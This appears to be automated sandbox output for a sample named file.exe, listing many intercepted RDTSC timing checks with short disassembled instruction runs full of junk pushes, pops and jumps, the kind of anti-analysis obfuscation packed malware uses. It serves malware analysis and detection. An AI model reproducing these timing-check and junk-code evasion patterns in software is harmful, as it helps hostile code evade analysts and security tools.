Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 970965 second address: 9709B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FB7D509B857h 0x0000000a jmp 00007FB7D509B84Dh 0x0000000f popad 0x00000010 jmp 00007FB7D509B859h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c push eax 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97063C second address: 970642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 970642 second address: 97064C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97064C second address: 97065A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnc 00007FB7D50A5ED6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97065A second address: 970671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB7D509B852h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 970671 second address: 970677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 970677 second address: 970682 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97521C second address: 975220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 974AD2 second address: 974ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jp 00007FB7D509B846h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 974ADF second address: 974B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EE9h 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c ja 00007FB7D50A5ED8h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 974B0C second address: 974B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 974C33 second address: 974C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 974C39 second address: 974C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Dh 0x00000009 jg 00007FB7D509B846h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 974C50 second address: 974C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB7D50A5EE2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 979327 second address: 97932F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97932F second address: 979345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jns 00007FB7D50A5ED6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9784D8 second address: 9784F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B857h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9784F4 second address: 97852A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EE0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FB7D50A5EE9h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97852A second address: 97852F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97852F second address: 978535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 978535 second address: 978548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB7D509B84Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 978548 second address: 97855C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9786A3 second address: 9786BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FB7D509B84Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9786BD second address: 9786CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FB7D50A5EDAh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 978991 second address: 9789A5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB7D509B84Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9789A5 second address: 9789B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EDFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9789B8 second address: 9789DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FB7D509B862h 0x0000000e jmp 00007FB7D509B84Eh 0x00000013 push edx 0x00000014 je 00007FB7D509B846h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 978E53 second address: 978E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FB7D50A5ED6h 0x0000000c popad 0x0000000d jnc 00007FB7D50A5EDCh 0x00000013 jo 00007FB7D50A5ED8h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d ja 00007FB7D50A5ED8h 0x00000023 pushad 0x00000024 jg 00007FB7D50A5ED6h 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D739 second address: 97D740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D740 second address: 97D751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB7D50A5ED6h 0x0000000a jng 00007FB7D50A5ED6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D751 second address: 97D75B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB7D509B852h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D75B second address: 97D761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97DA51 second address: 97DA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97DE6C second address: 97DE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97DE71 second address: 97DE76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97DE76 second address: 97DE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FB7D50A5ED6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9218A5 second address: 9218A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9218A9 second address: 921923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FB7D50A5ED8h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FB7D50A5ED8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push edx 0x0000002b mov edi, dword ptr [ebp+122D2CCAh] 0x00000031 pop ecx 0x00000032 call 00007FB7D50A5EE5h 0x00000037 pushad 0x00000038 push ecx 0x00000039 pop eax 0x0000003a movzx edi, dx 0x0000003d popad 0x0000003e pop edi 0x0000003f mov ebx, dword ptr [ebp+12485979h] 0x00000045 mov dword ptr [ebp+122D25C2h], ecx 0x0000004b mov edi, dword ptr [ebp+122D3860h] 0x00000051 add eax, ebx 0x00000053 add dword ptr [ebp+122D2FF9h], edi 0x00000059 mov dword ptr [ebp+122D387Eh], edi 0x0000005f push eax 0x00000060 push ebx 0x00000061 pushad 0x00000062 pushad 0x00000063 popad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 921923 second address: 921964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FB7D509B848h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 cld 0x00000024 push 00000004h 0x00000026 sub dword ptr [ebp+122D3A2Fh], ebx 0x0000002c pushad 0x0000002d xor dword ptr [ebp+122D19DDh], ecx 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jc 00007FB7D509B848h 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97E166 second address: 97E16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9863FE second address: 986404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 986404 second address: 98640A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98640A second address: 986412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 986412 second address: 986416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 986416 second address: 98641A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9846F8 second address: 9846FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98499E second address: 9849B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB7D509B846h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB7D509B84Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9849B4 second address: 9849BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9849BC second address: 9849C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 985275 second address: 98527A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 985571 second address: 9855B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB7D509B856h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FB7D509B859h 0x00000013 push edi 0x00000014 pop edi 0x00000015 jc 00007FB7D509B846h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 986100 second address: 986104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 986104 second address: 986133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB7D509B84Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007FB7D509B84Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007FB7D509B84Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DF91C second address: 8DF920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98B5CD second address: 98B5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98B5D1 second address: 98B5D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EB6F second address: 98EB88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FB7D509B846h 0x0000000e jmp 00007FB7D509B84Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EB88 second address: 98EBAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB7D50A5EDEh 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 popad 0x00000012 push ecx 0x00000013 jnl 00007FB7D50A5ED8h 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EE5D second address: 98EE61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EE61 second address: 98EE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EE6B second address: 98EE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EE6F second address: 98EE9C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FB7D50A5EDDh 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FB7D50A5EDFh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EE9C second address: 98EEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FB7D509B852h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EEB9 second address: 98EECE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB7D50A5ED6h 0x00000008 jo 00007FB7D50A5ED6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EECE second address: 98EED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EED7 second address: 98EEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EEDB second address: 98EEE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EFF6 second address: 98EFFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EFFD second address: 98F01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007FB7D509B851h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98F01B second address: 98F035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB7D50A5EDFh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98F035 second address: 98F039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98F16D second address: 98F177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB7D50A5ED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98F2DE second address: 98F2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB7D509B846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98F2E8 second address: 98F2F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98F2F2 second address: 98F2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993F04 second address: 993F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FB7D50A5EE1h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993F1A second address: 993F21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993F21 second address: 993F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FB7D50A5EE7h 0x0000000f jmp 00007FB7D50A5EE1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993F41 second address: 993F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B854h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993F59 second address: 993F5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993F5D second address: 993F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99BD23 second address: 99BD38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007FB7D50A5EDCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99BD38 second address: 99BD4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Dh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99BD4B second address: 99BD6A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FB7D50A5F06h 0x0000000e jmp 00007FB7D50A5EDDh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99BD6A second address: 99BD70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 999EF8 second address: 999F25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB7D50A5EDFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 999F25 second address: 999F37 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FB7D509B862h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 999F37 second address: 999F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A234 second address: 99A238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A238 second address: 99A23E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A681 second address: 99A689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A689 second address: 99A68F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A68F second address: 99A6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B84Fh 0x00000009 rdtsc
